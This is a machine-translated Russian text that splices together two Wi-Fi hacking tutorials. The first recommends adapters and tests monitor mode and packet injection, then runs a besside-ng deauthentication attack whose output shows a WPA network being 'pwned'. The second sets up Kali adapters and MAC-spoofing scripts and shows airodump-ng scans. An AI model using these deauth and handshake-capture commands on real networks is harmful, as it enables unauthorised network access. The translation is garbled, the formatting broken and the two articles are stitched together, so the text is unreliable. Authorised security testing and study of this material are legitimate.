Второй производитель — это тот, кто производит микросхему, питающую адаптер. Чип — это то, что контролирует поведение карты, поэтому гораздо важнее определить производителя чипсета, чем производителя адаптера.Например, в картах Panda Wireless часто используются наборы микросхем Ralink, которые являются наиболее важной информацией.

Определение набора микросхем

Известно, что некоторые наборы микросхем работают без особой или какой-либо конфигурации, необходимой для начала работы, а это означает, что вы можете ожидать, что адаптер, содержащий конкретный поддерживаемый набор микросхем, будет легким выбором.

Хорошее место для начала при поиске набора микросхем адаптера беспроводной сети, который вы собираетесь купить, — это страницы совместимости Aircrack-ng.Более старая «устаревшая» версия по-прежнему содержит много полезной информации о наборах микросхем, которые будут работать с Aircrack-ng и другими инструментами взлома Wi-Fi.

Более новая версия руководства Aircrack-ng также полезна для объяснения способа проверки совместимости новых карт, хотя в ней отсутствует простая для понимания таблица совместимости, как на устаревшей странице.

Помимо веб-сайта Aircrack-ng, вы часто можете найти информацию о карте на таком ресурсе, как база данных WikiDevi, которая позволяет вам найти подробную информацию о большинстве беспроводных сетевых адаптеров.Другой ресурс — это список официально поддерживаемых драйверов Linux, который включает удобную таблицу, показывающую, какие модели поддерживают режим монитора.

Наборы микросхем Atheros особенно популярны, поэтому, если вы подозреваете, что ваше устройство содержит набор микросхем Atheros, вы можете проверить руководство только для Atheros.

Не можете найти чипсет карты, которую вы ищете? Вы можете найти изображение идентификационного номера FCC на наклейке устройства. Номер можно ввести на такие веб-сайты, как FCCID.io, на которых размещены внутренние фотографии используемых чипсетов.

После того, как вы определили набор микросхем рассматриваемого устройства, вы сможете предсказать его поведение. Если набор микросхем рассматриваемого беспроводного сетевого адаптера указан как поддерживающий режим монитора, все готово.

Какая карта стоит

Чтобы упростить вам жизнь, следующие наборы микросхем, как известно, поддерживают режим монитора и внедрение пакетов в соответствии с нашим тестированием:

  • Atheros AR9271: Alfa AWUS036NHA — мой любимый длинный сетевой адаптер диапазона и стандарт, по которому я сужу другие адаптеры дальнего действия.Это стабильный, быстрый и хорошо поддерживаемый адаптер беспроводной сети b / g / n. Также есть TP-Link TL-WN722N , любимый как новичками, так и опытными хакерами. Это компактный адаптер b / g / n, который имеет одну из самых дешевых цен, но может похвастаться удивительно впечатляющей производительностью. При этом только v1 будет работать с Kali Linux, поскольку v2 использует другой набор микросхем.
  • Ralink RT3070: Этот набор микросхем находится внутри ряда популярных адаптеров беспроводной сети.Из них Alfa AWUS036NH — это адаптер b / g / n с абсурдным диапазоном действия. Он может быть усилен всенаправленной антенной и может быть соединен с антенной Yagi или Paddle для создания направленной антенной решетки. Alfa AWUS036NEH — это мощный адаптер b / g / n, тонкий и не требующий использования USB-кабеля, для более незаметного беспроводного адаптера, который можно подключить через USB. У него есть дополнительное преимущество, заключающееся в сохранении сменной антенны. Если вам нужен более скрытый вариант, который не выглядит так, как будто он может что-то взломать, вы можете рассмотреть g / n Panda PAU05 .Несмотря на небольшой размер, это низкопрофильный адаптер с высокой производительностью в ближнем и среднем диапазоне, ограниченный диапазон для случаев, когда вы хотите собирать сетевые данные, не включая все, что находится в нескольких блоках.
  • Ralink RT3572: В то время как предыдущие адаптеры работали только на 2,4 ГГц, Alfa AWUS051NH v2 — двухдиапазонный адаптер, который также совместим с сетями 5 ГГц. Хотя немного дороже, но двухдиапазонная емкость и совместимость с 802.11n draft 3.0 и 802.11a / b / g делают этот вариант более продвинутым.
  • Realtek 8187L (адаптеры Wireless G): В адаптерах Alfa AWUS036H USB 2,4 ГГц используется этот старый набор микросхем, который менее полезен и не поддерживает работу с большим количеством сетей. Эти карты по-прежнему будут работать с некоторыми сетями, поэтому они отлично подходят для новичков, так как их много дешевых.
  • Realtek RTL8812AU: Поддерживаемый в 2017 году, Alfa AWUS036ACH — это чудовище с двумя антеннами и 802.11ac и a, b, g, n совместимость со скоростью 300 Мбит / с на 2,4 ГГц и 867 Мбит / с на 5 ГГц. Это одно из новейших предложений, совместимых с Kali, поэтому, если вы ищете самый быстрый и длинный диапазон, этот адаптер следует рассмотреть. Чтобы использовать его, вам может потребоваться сначала запустить «apt update», а затем «apt install realtek-rtl88xxau-dkms», который установит необходимые драйверы для включения инъекции пакетов.

Aircrack-ng также называет несколько карт лучшими в своем классе на своем сайте, поэтому, если вас интересуют другие предложения, ознакомьтесь с ними (некоторые из перечисленных выше также есть в его списке).Также ознакомьтесь с нашим очным тестом беспроводных сетевых адаптеров, совместимых с Kali Linux.

На Amazon: Alfa AWUS036NHA Wireless B / G / N USB-адаптер

Другие соображения при выборе адаптера

Помимо набора микросхем, еще одним соображением является частота, на которой работает адаптер. В то время как большинство устройств Wi-Fi, включая устройства IoT, работают в более старом диапазоне 2,4 ГГц, многие новые устройства также предлагают сети 5 ГГц. Эти сети, как правило, быстрее и могут передавать больше данных, но также обычно работают в паре с 2.Сеть 4 ГГц. При покупке возникает вопрос: стоит ли вкладывать дополнительные деньги в антенну 2,4 / 5 ГГц, которая может обнаруживать (и атаковать) и то, и другое?

Во многих случаях, если целью вашей атаки не является сканирование всех доступных сетей в области, карта с частотой 2,4 ГГц подойдет. Если для вас важна частота 5 ГГц, существует множество карт Wi-Fi на 5 ГГц, которые поддерживают режим мониторинга и внедрение пакетов, например, Panda Wireless Pau09.

На Amazon: двухдиапазонный Panda Wireless PAU09 N600 (2.4 ГГц / 5 ГГц) Беспроводной USB-адаптер серии N

Еще одним важным фактором является определение необходимости установки специальной антенны. Хотя большинство всенаправленных антенн подойдет новичку, вы можете переключиться на антенну с диаграммой направленности, чтобы сосредоточиться на конкретной сети или области, а не на всем, что находится вокруг вас. В этом случае поищите адаптеры с антеннами, которые можно снять и заменить на другой тип.

Вариант 2: Проверьте существующий адаптер беспроводной сети

Если у вас уже есть адаптер беспроводной сети, вы можете довольно легко проверить, поддерживает ли набор микросхем внутри режим монитора и внедрение пакетов.Для начала подключите сетевой адаптер, а затем откройте окно терминала. Вы сможете определить набор микросхем сетевого адаптера, просто набрав lsusb -vv в окне терминала и выполнив поиск вывода, аналогичного приведенному ниже.

  lsusb -vv

Шина 001 Устройство 002: ID 148f: 5372 Ralink Technology, Corp. RT5372 Беспроводной адаптер
Дескриптор устройства:
  b Длина 18
  bDescriptorType 1
  bcdUSB 2.00
  bDeviceClass 0 (определяется на уровне интерфейса)
  bDeviceSubClass 0
  bDeviceProtocol 0
  bMaxPacketSize0 64
  idVendor 0x148f Ralink Technology, Corp.idProduct 0x5372 Беспроводной адаптер RT5372
  bcdDevice 1.01
  iManufacturer 1 Ralink
  iProduct 2 802.11 n WLAN
  iSerial 3 (ошибка)
  bNumConfigurations 1  

В моем примере я смотрю на сетевой адаптер Panda Wireless PAU06, который сообщает о наличии чипсета RT5372 от Ralink, который указан как поддерживаемый! Как только вы узнаете чипсет своей карты, вы должны иметь приблизительное представление о том, на что она способна.

Проверка возможностей адаптера

Теперь перейдем к более активному тестированию возможностей адаптера.

Шаг 1. Переведите вашу карту в режим монитора

На этом шаге мы выделим Airmon-ng, но перед этим вам нужно найти имя интерфейса. В вашей системе запустите команду ifconfig (или ip a ), чтобы увидеть список всех подключенных устройств. В Kali Linux ваша карта должна быть указана как что-то вроде wlan0 или wlan1.

  ifconfig

eth0: flags = 4163  mtu 1500
        inet 10.0.2.15 маска сети 255.255.255.0255.0 трансляция 10.0.2.255
        inet6 fe80 :: a00: 27ff: fe59: 1b51 prefixlen 64 scopeid 0x20 <ссылка>
        эфир 86: 09: 15: d2: 9e: 96 txqueuelen 1000 (Ethernet)
        Пакеты RX 700 байт 925050 (903,3 КБ)
        Ошибки RX 0 сброшено 0 переполнений 0 кадр 0
        Пакеты TX 519 байт 33297 (32,5 КБ)
        Ошибки передачи 0 сброшены 0 переполнения 0 несущей 0 коллизий 0

lo: flags = 73  mtu 65536
        inet 127.0.0.1 маска сети 255.0.0.0
        inet6 :: 1 prefixlen 128 scopeid 0x10 <хост>
        loop txqueuelen 1000 (локальный шлейф)
        Пакеты RX 20 байт 1116 (1.0 КБ)
        Ошибки RX 0 сброшено 0 переполнений 0 кадр 0
        Пакеты TX 20 байт 1116 (1,0 КБ)
        Ошибки передачи 0 сброшены 0 переполнения 0 несущей 0 коллизий 0

wlan0: flags = 4163  mtu 1500
        эфир EE-A5-3C-37-34-4A txqueuelen 1000 (Ethernet)
        Пакеты RX 0 байтов 0 (0,0 B)
        Ошибки RX 0 сброшено 0 переполнений 0 кадр 0
        Пакеты TX 0 байтов 0 (0,0 Б)
        Ошибки TX 0 сброшено 0 переполнений 0 коллизий несущей 0 0  

После того, как у вас есть имя сетевого интерфейса, вы можете попытаться перевести его в режим мониторинга, набрав airmon-ng start wlan0 (при условии, что имя вашего интерфейса — wlan0) .Если вы видите результат ниже, значит, ваша карта поддерживает режим беспроводного монитора.

  airmon-ng start wlan0

Найдено 3 процесса, которые могут вызвать проблемы.
Если airodump-ng, aireplay-ng или airtun-ng перестают работать после
через короткий промежуток времени вы можете запустить 'airmon-ng check kill'

  Имя PID
  428 NetworkManager
  522 клиент
  718 wpa_supplicant

Набор микросхем драйвера интерфейса PHY

phy1 wlan0 rt2800usb Ralink Technology, Corp. RT5372

(режим монитора mac80211 включен для [phy1] wlan0 на [phy1] wlan0mon)
(режим станции mac80211 vif отключен для [phy1] wlan0)  

Вы можете подтвердить результаты, набрав iwconfig , и вы должны увидеть, что имя вашей карты изменилось и добавлено «mon» в конце имени вашей карты .Он также должен сообщать «Режим: Монитор», если он был успешно переведен в режим мониторинга.

  iwconfig

wlan0mon Режим IEEE 802.11: Частота монитора: 2,457 ГГц Tx-Power = 20 дБм
          Retry short long limit: 2 RTS th: off Фрагмент th: off
          Управление питанием: выкл.  

Шаг 2. Проверьте свою карту на внедрение пакетов

Тестирование на внедрение пакетов довольно просто проверить благодаря инструментам, включенным в Airplay-ng. Переведя карту в режим монитора на последнем шаге, вы можете запустить тест, чтобы убедиться, что адаптер беспроводной сети может вводить пакеты в соседние беспроводные сети.

Начиная с вашего интерфейса в режиме монитора, убедитесь, что вы находитесь в непосредственной близости от нескольких сетей Wi-Fi, чтобы адаптер имел шанс на успех. Затем в окне терминала введите aireplay-ng —test wlan0mon , чтобы запустить тест внедрения пакета.

  aireplay-ng - тест wlan0mon

12:47:05 Ожидание кадра маяка (BSSID: AA: BB: CC: DD: EE) на канале 7
12:47:05 Пробуем широковещательные пробные запросы ...
12:47:06 Инъекция работает!
12:47:07 Найдено 1 AP

12:47:07 Испытание направленных зондовых запросов...
12:47:07 AA: BB: CC: DD: EE - канал: 7 - 'Добис'
12:47:08 Пинг (мин. / Сред. / Макс.): 0,891 мс / 15,899 мс / 32,832 мс Мощность: -21,72
12:47:08 29/30: 96%  

Если вы получили результат, подобный приведенному выше, поздравляю, ваша сетевая карта успешно внедряет пакеты в соседние сети. Если вы получите результат, подобный приведенному ниже, ваша карта может не поддерживать внедрение пакетов.

  aireplay-ng - тест wlan0mon

21:47:18 Ожидание кадра маяка (BSSID: AA: BB: CC: DD: EE) на канале 6
21:47:18 Пробуем пробные запросы вещания...
21:47:20 Нет ответа ...
21:47:20 Найдено 1 AP

21:47:20 Пробуем направленные зондовые запросы ...
21:47:20 74: 85: 2A: 97: 5B: 08 - канал: 6 - 'Добис'
21:47:26 0/30: 0%  

Шаг 3: Тест с атакой, чтобы убедиться, что все работает

Наконец, мы можем применить на практике два вышеупомянутых шага, попытавшись перехватить рукопожатие WPA с помощью Besside-ng , универсальный и чрезвычайно полезный инструмент для взлома WPA, который также является отличным способом проверить, способна ли ваша карта атаковать сеть WPA.

Для начала убедитесь, что поблизости есть сеть, у которой есть разрешение на атаку. По умолчанию Besside-ng атакует все, что находится в пределах досягаемости, и эта атака очень шумная. Besside-ng разработан для сканирования сетей с подключенным устройством, а затем атакует соединение, вводя пакеты деаутентификации, вызывая мгновенное отключение устройства. При повторном подключении хакер может использовать информацию, которой обмениваются устройства, чтобы попытаться подобрать пароль.

Введите команду besside-ng -R ‘Target Network’ wlan0mon , заменив поле -R на имя вашей тестовой сети.Он начнет попытки получить рукопожатие из сети жертвы. Чтобы это работало, должно быть устройство, подключенное к атакуемой сети Wi-Fi. Если устройства нет, значит, некому запустить сеть, поэтому вы не можете попытаться зафиксировать рукопожатие.

  besside-ng -R 'Целевая сеть' wlan0mon

[21:08:54] Поехали
[21:08:54] Продолжение с besside.log
[21:08:54] Добавление к wpa.cap
[21:08:54] Добавление к wep.cap
[21:08:54] Запись в besside.log  

Если вы получите результат, подобный приведенному ниже, поздравляем! Ваша карта способна захватывать рукопожатия из сетей WPA / WPA2.Вы также можете ознакомиться с нашим руководством по Besside-ng, чтобы узнать больше о том, на что способна атака Besside-ng.

  besside-ng wlan0mon

[03:20:45] Поехали
[03:20:45] Продолжение с besside.log
[03:20:45] Добавление к wpa.cap
[03:20:45] Добавление к wep.cap
[03:20:45] Вход в besside.log
[03:20:56] СОБСТВЕННЫЙ [DirtyLittleBirdyFeet *, Sonos *] СОБСТВЕННЫЙ []
[03:21:03] Плохое соединение - недоступность Sonos составила 0/10 (100% потеря) [-74 дБм]
[03:21:07] Получена необходимая информация о рукопожатии WPA для DirtyLittleBirdyFeet
[03:21:07] Запускаем aircrack на wpa.колпачок для ключа WPA
[03:21:07] Pwned сеть DirtyLittleBirdyFeet за 0:04 mins: sec
[03:21:07] СОБСТВЕННЫЙ [Sonos *] СОБСТВЕННЫЙ [DirtyLittleBirdyFeet *]  

Гибкий сетевой адаптер — ключ к взлому Wi-Fi

Мощный беспроводной сетевой адаптер с возможностью вводить пакеты и прослушивать Разговоры по Wi-Fi вокруг него дают любому хакеру преимущество перед радиоволнами. Выбор подходящего адаптера может сбивать с толку, но, внимательно проверив набор микросхем, вы можете быть уверены, что не удивитесь, когда сделаете покупку.Если у вас уже есть адаптер, рекомендуется его испытать, прежде чем использовать в полевых условиях, прежде чем вы будете полагаться на него в чем-то слишком важном.

Надеюсь, вам понравилось это руководство по тестированию ваших беспроводных сетевых карт для внедрения пакетов и режима беспроводного мониторинга. Если у вас есть какие-либо вопросы по этому руководству по адаптерам беспроводной сети, совместимым с Kali, или у вас есть комментарии, не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.

Не пропустите: проще взламывать Wi-Fi и сети с помощью ленивого скрипта

Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою хакерскую карьеру с помощью пакета обучения Premium Ethical Hacking Certification Bundle 2020 в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области кибербезопасности.

Купить сейчас (90% скидка)>

Другие выгодные предложения, которые стоит проверить:

Фотография на обложке и скриншоты от Kody / Null Byte Этический взлом

(Часть 14): Взлом беспроводной сети | автор: Майкл Уиттл

Многие люди просили эту статью, так что приступим 🙂

Для того, чтобы следовать этому руководству, вам понадобится следующее:

Большинство сетевых карт не поддерживают « Monitor Mode » и « Packet Injection », который необходим для этического взлома и тестирования на проникновение.Производитель, которого вы используете, в большинстве случаев не имеет значения, если он использует один из наборов микросхем, поддерживающих требуемую нам функциональность.

Самые популярные наборы микросхем для тестирования Pen Kali Linux

  • Alfa AWUS036NHA
  • Atheros AR9271
  • Ralink RT3070
  • Ralink RT3572
  • Ralink RT55724
  • te 904 мы использовали Kali Linux, установленную как виртуальную машину Virtual Box.Это сработает, но нам нужно будет внести некоторые изменения. В идеале использование Kali на загрузочном USB-устройстве или физическая установка будет проще, поскольку расширить беспроводную USB-карту до виртуальной машины непросто. Я все равно объясню, как это сделать, так как я настроил свой именно так.

    Для этого урока я купил две карты на Amazon для тестирования.

    Я купил эту беспроводную сетевую карту USB на Amazon за 23,97 фунтов стерлингов:

    И я также купил эту беспроводную сетевую карту USB на Amazon за 20 фунтов стерлингов.49 , и это карта, которую я бы порекомендовал. :

    Они оба работали, но карта WiFi Nation не загрузилась полностью при стандартной установке Kali. Казалось, что ядро ​​частично его обнаруживает и не может полностью перейти в режим мониторинга. Я связался с их службой поддержки, и они попросили меня загрузить настроенную версию Z Security, что я и сделал. Полностью переустанавливать Kali было не идеально, но я могу подтвердить, что их индивидуальная версия действительно работает. Карта Alfa работала в стандартной установке Kali, поэтому, если бы я выбрал одну из карт, я бы порекомендовал ее.

    Подготовка виртуального бокса для нового USB-адаптера…

    • Откройте настройки для нашего виртуального бокса Kali.
    • Щелкните Ports , затем USB .
    • Щелкните значок USB с зеленым +
    • Добавьте новую сетевую карту USB 3.0.
    • Дважды щелкните новый сетевой адаптер и измените « Remote » на « Да, »
    • Когда ваш Kali Virtual Box загрузится, щелкните меню виртуального окна « Devices », затем « USB » , затем ваш беспроводной сетевой адаптер.В моем случае « Realtek 802.11ac WAN Adapter [0200] ». Если вы этого не сделаете, USB не будет виртуально подключен, и Kali его не обнаружит. Если вам не удается сделать это при загрузке, вы все равно можете сделать это позже. Это похоже на виртуальное подключение USB-накопителя к операционной системе: он будет обнаружен, и все готово.

    Установка беспроводного USB-устройства…

    • Загрузитесь и войдите в Kali Linux
    • Откройте терминал и выполните sudo для получения root-прав
     kali @ kali: ~ $  sudo su -  
    [sudo] пароль для kali:
    root @ kali: ~ #
    • Откройте, « / etc / apt / sources.list »и убедитесь, что два репозитория прокомментированы.
     root @ kali: ~ #  vi /etc/apt/sources.list  deb http://http.kali.org/kali kali-last-snapshot main non-free contrib 
    deb-src http: // http.kali.org/kali kali-Rolling main non-free contrib
    • Убедитесь, что ваша система обновлена.
     root @ kali: ~ #  apt-get update -y && apt-get upgrade -y  
    Попадание: 1 http://kali.download/kali kali-Rolling InRelease
    Чтение списков пакетов... Готово
    Чтение списков пакетов ... Готово
    Построение дерева зависимостей
    Чтение информации о состоянии ... Готово
    Расчет обновления ... Готово
    0 обновлено, 0 недавно установлено, 0 для удаления и 111 не обновлено.
    root @ kali: ~ #
    • Если вы используете карту Realtek, вам необходимо установить драйверы для сетевой карты « Realtek RTL8811AU chipset ».
     root @ kali: ~ #  apt-get install realtek-rtl88xxau-dkms -y  
    Чтение списков пакетов... Готово
    Построение дерева зависимостей
    Чтение информации о состоянии ... Готово
    realtek-rtl88xxau-dkms - это уже самая новая версия (5.6.4.2 ~ git20200916-0kali1).
    0 обновлено, 0 установлено заново, 0 удалено и 111 не обновлено.
    root @ kali: ~ #
    • Если вы используете карту Alfa, все, что вам нужно сделать, это установить прошивку Atheros. Эту карту намного проще установить, и она работает с обычной установкой Kali. Если вы собираетесь купить карту для Kali, я бы порекомендовал именно эту.
     root @ kali: ~ #  apt-get install firmware-atheros -y  
    • Теперь вам нужно полностью выключить компьютер, не сохраняйте состояние.
     root @ kali: ~ #  poweroff  
    • Если вы используете карту WiFi Nation, их инструкции по установке немного сложнее. Как я уже упоминал, это на самом деле не сработало для меня, и в конце концов мне пришлось установить настроенную сборку Kali Z Security, чтобы она заработала.
     root @ kali: ~ #  apt install git  
    root @ kali: ~ # dkms git clone https: // github.com / gnab / rtl8812au.git
    root @ kali: ~ # cp -r rtl8812au /usr/src/rtl8812au-4.2.2
    root @ kali: ~ # dkms add -m rtl8812au -v 4.2.2
    root @ kali: ~ # dkms build -m rtl8812au -v 4.2.2
    root @ kali: ~ # dkms install -m rtl8812au -v 4.2.2
    • После перезагрузки проверьте, установлен ли модуль .
     root @ kali: ~ #  modprobe 8812au  

    Худшая часть — это попытка заставить Kali правильно определять USB-адаптер, который поддерживает « Monitor Mode » и « Packet Injection », но как только вы заставите его работать вам должно быть хорошо идти.

    «Режим монитора» работает?

    Есть несколько диагностических команд, которые вы захотите запустить, чтобы убедиться, что все работает. Если вы не видите свой « wlan0 » или аналогичный интерфейс в каждой команде, значит, ваша карта не была правильно обнаружена Kali. Одна из проблем, с которыми я столкнулся с картой WiFi Nation в Kali, заключалась в том, что все команды отображали интерфейс, кроме « iw ».

     root @ kali: ~ #  iw dev  
    phy # 1
    Интерфейс wlan0
    ifindex 4
    wdev 0x100000001
    addr 22: 92: 14: 15: 1a: 06
    тип управляемого
    канал 1 (2412 МГц), ширина: 20 МГц, центр1: 2412 МГц
    txpower 18.00 дБм
    root @ kali: ~ # lsusb
    Bus 002 Device 001: ID 1d6b: 0003 Linux Foundation 3.0 root hub
    Bus 001 Device 005: ID 0bda: 0811 Realtek Semiconductor Corp. 802.11ac WLAN-адаптер
    Bus 001 Устройство 004: ID 80ee: 0021 VirtualBox USB Tablet
    Bus 001 Устройство 001: ID 1d6b: 0002 Linux Foundation 2.0 root hubroot @ kali: ~ # ifconfig
    eth0: flags = 4163 mtu 1500
    inet 192.168.1.2 сетевая маска 255.255.255.0 широковещательная передача 192.168.1.255
    ether 08: 00: 27: 61: 84: e4 txqueuelen 1000 (Ethernet)
    пакетов RX 2574 байта 1126619 (1,0 MiB)
    ошибок RX 0 отброшено 944 переполнения 0 кадр 0
    пакетов TX 728 байтов 83874 (81,9 KiB )
    ошибок передачи 0 отброшено 0 переполнений 0 коллизий несущей 0 0lo: flags = 73 mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    loop txqueuelen 1000 (Local Loopback)
    пакетов RX 15 байтов 729 ( 729.0 B)
    ошибок RX 0 отброшено 0 переполнений 0 кадров 0
    пакетов TX 15 байтов 729 (729.0 B)
    ошибок передачи 0 отброшено 0 переполнений 0 коллизий несущей 0 0 wlan0: flags = 4099 mtu 2312
    ether 22: 92: 14: 15: 1a: 06 txqueuelen 1000 (Ethernet)
    RX пакетов 0 байт 0 (0,0 B)
    ошибок RX 0 отброшено 0 переполнений 0 кадров 0
    пакетов TX 0 байтов 0 (0,0 B)
    ошибок TX 0 отброшено 0 переполнений 0 коллизий несущей 0 0
    root @ kali: ~ # ip link
    1: lo: mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
    2: eth0: mtu 1500 qdisc pfifo_fast состояние Режим UP DEFAULT группа по умолчанию qlen 1000
    ссылка / эфир 08: 00: 27: 61: 84: e4 brd ff: ff: ff: ff: ff: ff
    4: wlan0: mtu 2312 qdisc mq state DORMANT mode DORMANT group default qlen 1000
    link / ether 22: 92: 14: 15: 1a: 06 brd ff: ff: ff: ff: ff: ff
    root @ kali: ~ # iwconfig
    lo нет беспроводных расширений. wlan0 IEEE 802.11 ESSID: выкл. / Любой
    Режим: управляемая точка доступа: несвязанная Tx-Power = 18 дБм
    Краткое ограничение повторной попытки: 7 RTS thr: off Фрагмент th: off
    Ключ шифрования: выкл
    Управление питанием: выкл

    eth0 нет беспроводных расширений.

    Как видите, карта в настоящее время находится в режиме «, управляемый, ».

     root @ kali: ~ #  iw dev  
    phy # 1
    Интерфейс wlan0
    ifindex 4
    wdev 0x100000001
    addr 92: 6a: 88: 99: a9: fa
    тип управляемый
    канал 1 (2412 МГц) , ширина: 20 МГц, center1: 2412 МГц
    txpower 18.00 дБм

    Мы хотим изменить это на режим « монитор ».

     root @ kali: ~ #  ip link set wlan0 down  
    root @ kali: ~ # iwconfig wlan0 mode monitor
    root @ kali: ~ # ip link set wlan0 up
    root @ kali: ~ # iw dev
    phy # 1
    Интерфейс wlan0
    ifindex 4
    wdev 0x100000001
    addr 92: 6a: 88: 99: a9: fa
    тип монитор
    канал 1 (2412 МГц), ширина: 20 МГц, center1: 2412
    МГц txpower 18.00 дБм

    Что немного сбивало с толку, так это то, что перевод вашей беспроводной карты в режим « monitor » может создавать или не создавать другой виртуальный интерфейс под названием « wlan0mon ». Почти во всей документации, которую я прочитал, говорилось, что этот интерфейс должен быть создан. Однако я обнаружил, что некоторые карты (например, те, которые я использую) не создают другой интерфейс и не позволяют осуществлять мониторинг на существующем « wlan0 ». Когда вы переводите свою карту в « Monitor Mode », запустите « ifconfig ».Если вы видите « wlan0mon », используйте это, в противном случае используйте « wlan0 ».

     root @ kali: ~ #  airmon-ng check kill  Удаление этих процессов: PID Name 
    613 wpa_supplicantroot @ kali: ~ # airmon-ng start wlan0 PHY Interface Driver Chipsetphy1 wlan0 88XXau Realtek Semiconductor Corp. 802.11ac WLAN Adapter.
    (режим монитора включен)

    Подтвердите, что мониторинг работает …

     root @ kali: ~ #  airodump-ng wlan0  <- или ваш wlan0monCH 10] [Прошло: 6 с] [2020-10-25 17: 03BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSIDC0: 3E: 0F: 2A: F4: 8D -1 0 3 0 1 -1 WPA  
    26: 4C: E3: 5C: 8E: 73-22 4 0 0 1130 WPA2 CCMP PSK <длина: 21>
    E8: AD: A6: E0: 45: A4 -57 20 13 0 6 195 WPA2 CCMP PSK УДАЛЕН
    EA: AD: A6: E0: 47: A5 -56 23 0 0 6 195 OPN REMOVED
    AC: 84: C6: 55: 95: B8 -79 10 0 0 11 270 WPA2 CCMP PSK УДАЛЕН
    58: EF: 68: 07: BE: 07-81 5 0 0 1130 WPA2 CCMP PSK УДАЛЕН
    D0: 57: 94: B8: AC: F6 -74 5 0 0 1 130 WPA2 CCMP PSK REMOVED
    AC: E2: D3: 31: 2A: 14-105 5 0 0 6 65 WPA2 CCMP PSK <длина: 23> BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) 54: E0: 19: 6F: 17: 54-49 0 - 1 8
    C0: 3E: 0F: 2A: F4: 8D FC: A1: 83: 93: 55: C9 -55 0 -24e 0 10
    58: EF: 68: 07 : BE: 07 24: 4C: E3: 5C: 0E: 73-23 0 -24e 0 3
    58: EF: 68: 07: BE: 07 68: 54: FD: C4: 19: B5 -44 0 -24e 0 17

    «Пакетная инъекция» работает?

     root @ kali: ~ #  aireplay-ng -9 wlan0  
    17:06:08 Пробуем пробные широковещательные запросы...
    17:06:10 Нет ответа ...
    17:06:10 Найдено 1 AP17: 06: 10 Попытка направленных запросов зондирования ...
    17:06:10 AC: 84: C6: 55: 95: B8 - канал: 11 - «УДАЛЕНО»
    17:06:11 Ping (мин. / сред. / макс.): 1,489 мс / 5,576 мс / 23,743 мс Мощность: -77,71
    17:06:11 28/30: 93% 17: 06 : 11 Заливка работает!

    Облегчая жизнь…

    Переключение между режимом « Monitor » и режимом « Managed » немного затруднительно, так как есть несколько команд для выполнения. Было бы проще создать себе несколько простых сценариев bash, чтобы они выполнялись автоматически.

    Сначала создадим два пустых файла и дадим им разрешение на выполнение.

     root @ kali: ~ #  touch monitor.sh  
    root @ kali: ~ # chmod + x monitor.sh root @ kali: ~ # touch managed.sh
    root @ kali: ~ # chmod + x managed.sh

    Определите, где находится bash в вашей системе.

     root @ kali: ~ #  which bash  
    / usr / bin / bash

    Отредактируйте файл « monitor.sh » и добавьте следующий контент.

     #! / Usr / bin / bashairmon-ng check kill 
    ip link set wlan0 down
    macchanger -r wlan0
    iwconfig wlan0 mode monitor
    ip link set wlan0 up
    iw dev | grep type

    Если ваше местоположение bash отличается от моего в первой строке, измените его. Я также включил изменение вашего MAC-адреса на что-то случайное. Если вы тестируете сеть на проникновение (с разрешения), вы можете смоделировать настоящую атаку.

    Отредактируйте файл « managed.sh » и добавьте следующее содержимое.

     #! / Usr / bin / bashservice NetworkManager restart 
    ip link set wlan0 down
    iwconfig wlan0 mode managed
    ip link set wlan0 up
    iw dev | grep type

    Давайте рассмотрим различные инструменты и способы их использования …

    airodump-ng

     root @ kali: ~ #  airodump-ng --help  Airodump-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe 
    https: //www.aircrack-ng.orgusage: airodump-ng [, , ...] Параметры:
    --ivs: Сохранить только захваченные IV
    - gpsd: использовать GPSd
    --write <префикс>: префикс файла дампа
    -w: то же, что и --write
    --beacons: записывать все маяки в файл дампа
    --update : отображать задержку обновления в секундах
    - -showack: выводит статистику ack / cts / rts
    -h: скрывает известные станции для --showack
    -f : время в мс между переключениями каналов
    --berlin : время до удаления точки доступа / клиента
    с экрана, когда больше нет пакетов
    (по умолчанию: 120 секунд)
    -r <файл>: Rea d пакетов из этого файла
    -T: При чтении пакетов из файла
    моделирует скорость их прибытия
    , как если бы они были «живыми».
    -x : Active Scanning Simulation
    --manufacturer: Отображение производителя из списка IEEE OUI
    --uptime: Отображение времени работы AP по метке времени маяка
    --wps: Отображение информации WPS (если есть)
    --output-format
    <форматы>: выходной формат. Возможные значения:
    pcap, ivs, csv, gps, kismet, netxml, logcsv
    --ignore-negative-one: удаляет сообщение о фиксированном канале
    <интерфейс>: -1
    --write-interval
    <секунды> : Интервал записи выходного файла (ов) в секундах
    --background <включить>: переопределить обнаружение фона.
    -n : минимальное количество пакетов AP, полученных до
    для его отображения Параметры фильтра:
    --encrypt : фильтровать AP по набору шифров
    --netmask : фильтровать AP по маске
    --bssid < bssid>: фильтровать AP по BSSID
    --essid : фильтровать AP по ESSID
    --essid-regex : фильтровать AP по ESSID, используя регулярное выражение

    -a: фильтровать несвязанных клиентов По умолчанию, airodump-ng прыгает на 2.Каналы 4GHz.
    Вы можете сделать захват на другом / определенном канале (ах), используя:
    --ht20: установить канал на HT20 (802.11n)
    --ht40-: установить канал на HT40- (802.11n)
    --ht40 +: Установите канал на HT40 + (802.11n)
    --channel : захват на определенных каналах
    --band : диапазон, на котором airodump-ng должен переключаться
    -C : использует эти частоты в МГц для переключения
    --cswitch : установить метод переключения каналов
    0: FIFO (по умолчанию)
    1: циклический перебор
    2: переход на последних
    -s: то же, что и --cswitch - help: отображает этот экран использования

    Basic использование, выполняющее широкое сканирование беспроводных сетей в радиусе действия.

     root @ kali: ~ #  airodump-ng wlan0  CH 9] [Прошло: 6 с] [2020-10-25 18: 53BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSIDC0: 3E: 0F : 2A: F4: 8D -1 0 0 0 1 -1 <длина: 0> 
    26: 4C: E3: 5C: 8E: 73-22 5 0 0 1130 WPA2 CCMP PSK <длина: 21>
    EA: AD : A6: E0: 47: A5 -58 15 0 0 6 195 OPN УДАЛЕНА
    E8: AD: A6: E0: 45: A4 -58 12 7 0 6 195 WPA2 CCMP PSK УДАЛЕН
